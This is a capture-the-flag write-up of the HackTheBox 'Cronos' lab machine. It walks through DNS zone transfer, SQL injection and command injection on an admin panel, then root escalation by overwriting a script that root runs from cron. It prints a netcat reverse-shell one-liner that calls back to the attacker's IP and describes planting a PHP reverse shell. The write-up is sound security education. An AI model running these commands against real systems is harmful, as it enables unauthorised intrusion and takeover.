Ethical Hacking Lessons — Cronos Writeup

Kamran Bilgrami
7 min read · Dec 21, 2019

This write-up is for the HackTheBox Cronos machine. DNS zone transfer is the mechanism used to replicate DNS records across multiple name servers. If it is not restricted properly, the resulting information leak hands an attacker vital clues about hostnames and attack surface. This write-up shows how information obtained from a DNS zone transfer, chained with other vulnerabilities, can lead to an attacker owning critical infrastructure.

Cronos is a medium-rated Linux machine with the IP address 10.10.10.13. Below is its radar graph.

Nmap's TCP port scan results are shown below.

An Nmap scan of all UDP ports was taking too long, so I performed a top-1000 UDP port scan as shown below.

Recon Results Analysis

The scan results reveal that the DNS port is open on both TCP and UDP on this box. We also found the HTTP and SSH ports open on the target.

Enumeration

Let's start by enumerating port 80. Browsing to the home page shows the default Apache Ubuntu page.

The Wappalyzer browser plugin shows the following information about the web server and the operating system; nothing earth-shattering here.

I ran other tools like nikto and DirBuster but did not find anything very useful. Enumerating a website can become a lengthy task, and there is a lot more we could try, but let's move on to DNS enumeration for now.

As we noticed in the scan results, both the TCP and UDP ports are open for DNS. Ordinary DNS queries use UDP port 53; TCP port 53 is typically needed for zone transfers and for responses too large for a single UDP datagram, such as DNSSEC-signed records or long IPv6 answers. Since this box has DNS listening on TCP, it is worth investigating further.

We can start with the nslookup tool, which is used to query DNS records. Running a reverse lookup against the IP address gave us the domain name cronos.htb.

Let’s add it to the /etc/hosts file.

We can then use the host command with the -l switch, which requests a zone transfer and lists all the hosts in the domain.

This revealed another hostname, admin.cronos.htb. With the right wordlist we could potentially have found this subdomain by brute-forcing as well. Let's add it to the /etc/hosts file too.

Browsing to this subdomain brings up the following login panel.

The source code for this page didn’t show anything interesting.

I tried different combinations of username/password without any luck, so I decided to give SQL injection a try. After trying many, many combinations from various possibilities, the following entry from this cheatsheet worked for me.

It brought me to the following page.

Clicking Execute did not seem to do much. However, the dropdown has a ping option too.

When I clicked Execute with the Ping option, I got the following result.

This suggests that there may be some sort of command injection here, so I decided to take it to the next step by attempting to run a whoami command as follows.

This came back with www-data as the output.

That’s great.

Enum Analysis

Enumeration found that the admin portal has a command injection vulnerability. We can attempt to exploit it to get the flags we need.

Exploitation

In order to exploit the command injection, I tried various tricks from the PenTestMonkey reverse-shell cheatsheet, and the following one-liner worked for me with the IP and port updated for my box.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 >/tmp/f

I simply entered this one-liner in the admin portal.

Of course, I first launched a listener on my box on the same port, 4444.

Hitting the Execute button then gave me a low-privilege shell and the user flag, as shown below.

Privilege Escalation

Now that we have an initial foothold, it's time to attempt privilege escalation and go for the root flag. However, the current shell is not an interactive one, so let's upgrade it with the following steps.

  1. Spawn a /bin/bash shell using a Python script.
  2. Background the current shell using Ctrl+Z.
  3. Put the local terminal into raw mode and turn off local echo with stty raw -echo.
  4. Lastly, bring the listener shell back to the foreground by typing fg and then hit Enter twice.

In order to find options for privilege escalation, I downloaded the LinEnum script to my attack machine and launched a web server there as follows.

I then downloaded this script onto the target machine.

Running this script on the target machine provided some useful information. One key piece of that information, related to the crontab, is shown in the image below.

The crontab is the list of programs scheduled to run on the system. The * * * * * at the start of the line indicates that this particular job is scheduled to run every minute. The job also runs as the privileged user root. Finally, the current user (www-data) appears to have full permissions on the file that is scheduled to run once a minute, /var/www/laravel/artisan.

We can verify that the www-data user has the necessary permissions on the /var/www/laravel/artisan file.
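The misconfiguration here is a root cron job whose script is writable by an unprivileged account. As an added example (not part of the original write-up), the following shell script audits a system-format crontab for exactly that condition; the crontab, file names and permissions in the demo are constructed, and the script assumes a Linux/BSD userland with ls, awk and find.

```shell
#!/bin/sh
# Audit a system crontab (m h dom mon dow user command) for jobs that run as
# a privileged account but whose command or script files can be modified by
# other users. Constructed sample data; not the write-up's or the box's code.

# Owner of a file, taken from the third column of ls -ld.
file_owner() {
    ls -ld "$1" | awk '{print $3}'
}

# Print an UNSAFE line if the file is not owned by the trusted account
# (default root) or is group- or world-writable; print nothing if it is fine.
check_job_target() {
    f=$1
    trusted=${2:-root}
    owner=$(file_owner "$f")
    if [ "$owner" != "$trusted" ]; then
        echo "UNSAFE owner=$owner $f"
    elif [ -n "$(find "$f" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        echo "UNSAFE writable-by-others $f"
    fi
}

# For each job in the crontab running as $trusted, check every absolute path
# in its command that exists as a regular file (interpreter and script alike).
audit_crontab() {
    trusted=${2:-root}
    while IFS= read -r line; do
        case $line in ''|'#'*|[A-Za-z_]*=*) continue ;; esac   # blanks, comments, env
        user=$(printf '%s\n' "$line" | awk '{print $6}')
        [ "$user" = "$trusted" ] || continue
        cmd=$(printf '%s\n' "$line" | awk '{for (i = 7; i <= NF; i++) printf "%s ", $i}')
        for tok in $cmd; do
            case $tok in /*) [ -f "$tok" ] && check_job_target "$tok" "$trusted" ;; esac
        done
    done < "$1"
}

# Demo on constructed data: an artisan-like script left world-writable beside a
# correctly protected one. The current account stands in as the trusted owner
# so the demo runs without root; on a real host use the default (root).
demo_dir=$(mktemp -d)
printf '<?php\n' > "$demo_dir/artisan"; chmod 0777 "$demo_dir/artisan"
printf '#!/bin/sh\n' > "$demo_dir/backup.sh"; chmod 0755 "$demo_dir/backup.sh"
cat > "$demo_dir/crontab" <<EOF
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * $(id -un) php $demo_dir/artisan schedule:run >> /dev/null 2>&1
0 3 * * * $(id -un) $demo_dir/backup.sh
EOF
audit_crontab "$demo_dir/crontab" "$(id -un)"   # reports only the artisan file
rm -rf "$demo_dir"
```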

The artisan file is a PHP script that appears to act as the application's bootstrap and class loader.

If we can replace the contents of this file so that executing it initiates a shell back to our attack machine, that code will run with root privileges and give us a root shell. Since the file is a PHP script, let's head back to the PenTestMonkey PHP reverse shell. We will have to update the attack machine IP address and the listening port in that script.

Now download this script to the victim machine, overwriting the artisan file.

Launch a listener on the attack machine on port 4445.

Now just wait for the cron job to run; within a minute we get a root shell and the root flag.

Root Cause Analysis

Multiple attack vectors were found on this box.

  • DNS zone transfers should only be allowed from a trusted set of hosts, such as the secondary name servers.
  • The website has both SQL injection and command injection vulnerabilities.
  • A root cron job executes a file that a low-privileged user (www-data) can modify.
